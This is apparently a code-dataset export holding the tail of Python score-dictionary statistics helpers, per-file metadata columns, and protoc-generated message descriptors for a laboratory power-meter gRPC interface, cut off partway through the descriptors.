        string cannot be parsed.
    """
    # Bug fix: `json` was never imported in the original module, so string
    # input always failed; the bare except is replaced with an explicit
    # string check and a narrow ValueError catch.
    if isinstance(score_dict, str):
        try:
            # Serialized dicts use single quotes; JSON requires double quotes.
            score_dict = json.loads(score_dict.replace('\'', '\"'))
        except ValueError:
            return np.nan

    if not score_dict:
        return np.nan

    return np.min(list(score_dict.values()))
def calc_max_from_dict(score_dict):
    """Return the largest value in a score dictionary.

    :param score_dict: Either a dict of scores or its single-quoted string
        serialization.
    :return: Maximum value, or numpy.nan if the dict is empty, falsy, or the
        string cannot be parsed.
    """
    # Bug fix: `json` was never imported in the original module, so string
    # input always failed; the bare except is replaced with an explicit
    # string check and a narrow ValueError catch.
    if isinstance(score_dict, str):
        try:
            # Serialized dicts use single quotes; JSON requires double quotes.
            score_dict = json.loads(score_dict.replace('\'', '\"'))
        except ValueError:
            return np.nan

    if not score_dict:
        return np.nan

    return np.max(list(score_dict.values()))
def calc_range_from_dict(score_dict):
    """Return max value minus min value of a score dictionary.

    :param score_dict: Either a dict of scores or its single-quoted string
        serialization.
    :return: Value range, or numpy.nan if the dict is empty, falsy, or the
        string cannot be parsed.
    """
    # Bug fix: `json` was never imported in the original module, so string
    # input always failed; the bare except is replaced with an explicit
    # string check and a narrow ValueError catch.
    if isinstance(score_dict, str):
        try:
            # Serialized dicts use single quotes; JSON requires double quotes.
            score_dict = json.loads(score_dict.replace('\'', '\"'))
        except ValueError:
            return np.nan

    if not score_dict:
        return np.nan

    values = list(score_dict.values())
    return np.max(values) - np.min(values)
def calc_mean_from_dict(score_dict):
    """Return the mean value of a score dictionary.

    :param score_dict: Either a dict of scores or its single-quoted string
        serialization.
    :return: Mean value, or numpy.nan if the dict is empty, falsy, or the
        string cannot be parsed.
    """
    # Bug fix: `json` was never imported in the original module, so string
    # input always failed; the bare except is replaced with an explicit
    # string check and a narrow ValueError catch.
    if isinstance(score_dict, str):
        try:
            # Serialized dicts use single quotes; JSON requires double quotes.
            score_dict = json.loads(score_dict.replace('\'', '\"'))
        except ValueError:
            return np.nan

    if not score_dict:
        return np.nan

    return np.mean(list(score_dict.values()))
def calc_num_neg_from_dict(score_dict):
    """Count strictly negative values in a score dictionary.

    :param score_dict: Either a dict of scores or its single-quoted string
        serialization.
    :return: Number of values < 0, or numpy.nan if the dict is empty, falsy,
        or the string cannot be parsed.
    """
    # Bug fix: `json` was never imported in the original module, so string
    # input always failed; the bare except is replaced with an explicit
    # string check and a narrow ValueError catch.
    if isinstance(score_dict, str):
        try:
            # Serialized dicts use single quotes; JSON requires double quotes.
            score_dict = json.loads(score_dict.replace('\'', '\"'))
        except ValueError:
            return np.nan

    if not score_dict:
        return np.nan

    return sum(1 for val in score_dict.values() if val < 0)
def calc_num_pos_from_dict(score_dict):
    """Count strictly positive values in a score dictionary.

    :param score_dict: Either a dict of scores or its single-quoted string
        serialization.
    :return: Number of values > 0, or numpy.nan if the dict is empty, falsy,
        or the string cannot be parsed.
    """
    # Bug fix: `json` was never imported in the original module, so string
    # input always failed; the bare except is replaced with an explicit
    # string check and a narrow ValueError catch.
    if isinstance(score_dict, str):
        try:
            # Serialized dicts use single quotes; JSON requires double quotes.
            score_dict = json.loads(score_dict.replace('\'', '\"'))
        except ValueError:
            return np.nan

    if not score_dict:
        return np.nan

    return sum(1 for val in score_dict.values() if val > 0)
| 19.945205
| 71
| 0.645261
| 438
| 2,912
| 4.043379
| 0.105023
| 0.182947
| 0.058724
| 0.076793
| 0.815359
| 0.792772
| 0.78035
| 0.757199
| 0.757199
| 0.757199
| 0
| 0.003863
| 0.199863
| 2,912
| 145
| 72
| 20.082759
| 0.756223
| 0
| 0
| 0.634615
| 0
| 0
| 0.052403
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.144231
| false
| 0.067308
| 0.019231
| 0.009615
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
8f7cdc57728d17d24e6648a81187f53e42054688
| 60,183
|
py
|
Python
|
instrosetta/interfaces/light_analysis/power_meter_pb2.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
instrosetta/interfaces/light_analysis/power_meter_pb2.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
instrosetta/interfaces/light_analysis/power_meter_pb2.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: instrosetta/interfaces/light_analysis/power_meter.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='instrosetta/interfaces/light_analysis/power_meter.proto',
package='instrosetta.interfaces.light_analysis.power_meter.v1',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n7instrosetta/interfaces/light_analysis/power_meter.proto\x12\x34instrosetta.interfaces.light_analysis.power_meter.v1\"\xc1\x01\n\x11InitializeRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12k\n\nproperties\x18\x02 \x03(\x0b\x32W.instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.PropertiesEntry\x1a\x31\n\x0fPropertiesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"3\n\x12InitializeResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07success\x18\x02 \x01(\x08\"\x1f\n\x0fShutdownRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\"1\n\x10ShutdownResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07success\x18\x02 \x01(\x08\".\n\x0fGetPowerRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05units\x18\x02 \x01(\t\"B\n\x10GetPowerResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"A\n\x0fSetPowerRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"B\n\x10SetPowerResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\".\n\x0fGetCountRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05units\x18\x02 \x01(\t\"B\n\x10GetCountResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"A\n\x0fSetCountRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"B\n\x10SetCountResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"3\n\x14GetWavelengthRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05units\x18\x02 \x01(\t\"G\n\x15GetWavelengthResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"F\n\x14SetWavelengthRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 
\x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"G\n\x15SetWavelengthResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"-\n\x0eGetModeRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05units\x18\x02 \x01(\t\"A\n\x0fGetModeResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"@\n\x0eSetModeRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"A\n\x0fSetModeResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"2\n\x13GetAutorangeRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05units\x18\x02 \x01(\t\"F\n\x14GetAutorangeResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"E\n\x13SetAutorangeRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"F\n\x14SetAutorangeResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 
\x01(\t2\xaa\x0f\n\nPowerMeter\x12\xa1\x01\n\nInitialize\x12G.instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest\x1aH.instrosetta.interfaces.light_analysis.power_meter.v1.InitializeResponse\"\x00\x12\x9b\x01\n\x08Shutdown\x12\x45.instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownRequest\x1a\x46.instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownResponse\"\x00\x12\x9b\x01\n\x08GetPower\x12\x45.instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerRequest\x1a\x46.instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse\"\x00\x12\x9b\x01\n\x08SetPower\x12\x45.instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest\x1a\x46.instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse\"\x00\x12\x9b\x01\n\x08GetCount\x12\x45.instrosetta.interfaces.light_analysis.power_meter.v1.GetCountRequest\x1a\x46.instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse\"\x00\x12\x9b\x01\n\x08SetCount\x12\x45.instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest\x1a\x46.instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse\"\x00\x12\xaa\x01\n\rGetWavelength\x12J.instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthRequest\x1aK.instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse\"\x00\x12\xaa\x01\n\rSetWavelength\x12J.instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest\x1aK.instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse\"\x00\x12\x98\x01\n\x07GetMode\x12\x44.instrosetta.interfaces.light_analysis.power_meter.v1.GetModeRequest\x1a\x45.instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse\"\x00\x12\x98\x01\n\x07SetMode\x12\x44.instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest\x1a\x45.instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse\"\x00\x12\xa7\x01\n\x0cGetAutorange\x12I.instrosetta.interfaces.light_analysis.power_meter.v1.GetAu
torangeRequest\x1aJ.instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse\"\x00\x12\xa7\x01\n\x0cSetAutorange\x12I.instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest\x1aJ.instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse\"\x00\x62\x06proto3')
)
# Generated descriptor for the InitializeRequest.PropertiesEntry map-entry
# message (protoc output; regenerate from the .proto rather than editing).
_INITIALIZEREQUEST_PROPERTIESENTRY = _descriptor.Descriptor(
  name='PropertiesEntry',
  full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.PropertiesEntry',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='key', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.PropertiesEntry.key', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='value', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.PropertiesEntry.value', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=_b('8\001'),
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=258,
  serialized_end=307,
)
# Generated descriptor for the InitializeRequest message (protoc output;
# regenerate from the .proto rather than editing).
_INITIALIZEREQUEST = _descriptor.Descriptor(
  name='InitializeRequest',
  full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='properties', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.properties', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[_INITIALIZEREQUEST_PROPERTIESENTRY, ],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=114,
  serialized_end=307,
)
# Generated descriptor for the InitializeResponse message (protoc output;
# regenerate from the .proto rather than editing).
_INITIALIZERESPONSE = _descriptor.Descriptor(
  name='InitializeResponse',
  full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeResponse.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='success', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.InitializeResponse.success', index=1,
      number=2, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=309,
  serialized_end=360,
)
# Generated descriptor for the ShutdownRequest message (protoc output;
# regenerate from the .proto rather than editing).
_SHUTDOWNREQUEST = _descriptor.Descriptor(
  name='ShutdownRequest',
  full_name='instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownRequest.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=362,
  serialized_end=393,
)
# Generated descriptor for the ShutdownResponse message (protoc output;
# regenerate from the .proto rather than editing).
_SHUTDOWNRESPONSE = _descriptor.Descriptor(
  name='ShutdownResponse',
  full_name='instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownResponse.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='success', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownResponse.success', index=1,
      number=2, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=395,
  serialized_end=444,
)
# Generated descriptor for the GetPowerRequest message (protoc output;
# regenerate from the .proto rather than editing).
_GETPOWERREQUEST = _descriptor.Descriptor(
  name='GetPowerRequest',
  full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerRequest.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerRequest.units', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=446,
  serialized_end=492,
)
# Generated descriptor for the GetPowerResponse message (protoc output;
# regenerate from the .proto rather than editing).
_GETPOWERRESPONSE = _descriptor.Descriptor(
  name='GetPowerResponse',
  full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse.magnitude', index=1,
      number=2, type=1, cpp_type=5, label=1,
      has_default_value=False, default_value=float(0),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse.units', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=494,
  serialized_end=560,
)
# Generated descriptor for the SetPowerRequest message (protoc output;
# regenerate from the .proto rather than editing).
_SETPOWERREQUEST = _descriptor.Descriptor(
  name='SetPowerRequest',
  full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest.magnitude', index=1,
      number=2, type=1, cpp_type=5, label=1,
      has_default_value=False, default_value=float(0),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest.units', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=562,
  serialized_end=627,
)
_SETPOWERRESPONSE = _descriptor.Descriptor(
name='SetPowerResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=629,
serialized_end=695,
)
_GETCOUNTREQUEST = _descriptor.Descriptor(
name='GetCountRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountRequest.units', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=697,
serialized_end=743,
)
_GETCOUNTRESPONSE = _descriptor.Descriptor(
name='GetCountResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=745,
serialized_end=811,
)
_SETCOUNTREQUEST = _descriptor.Descriptor(
name='SetCountRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=813,
serialized_end=878,
)
_SETCOUNTRESPONSE = _descriptor.Descriptor(
name='SetCountResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=880,
serialized_end=946,
)
_GETWAVELENGTHREQUEST = _descriptor.Descriptor(
name='GetWavelengthRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
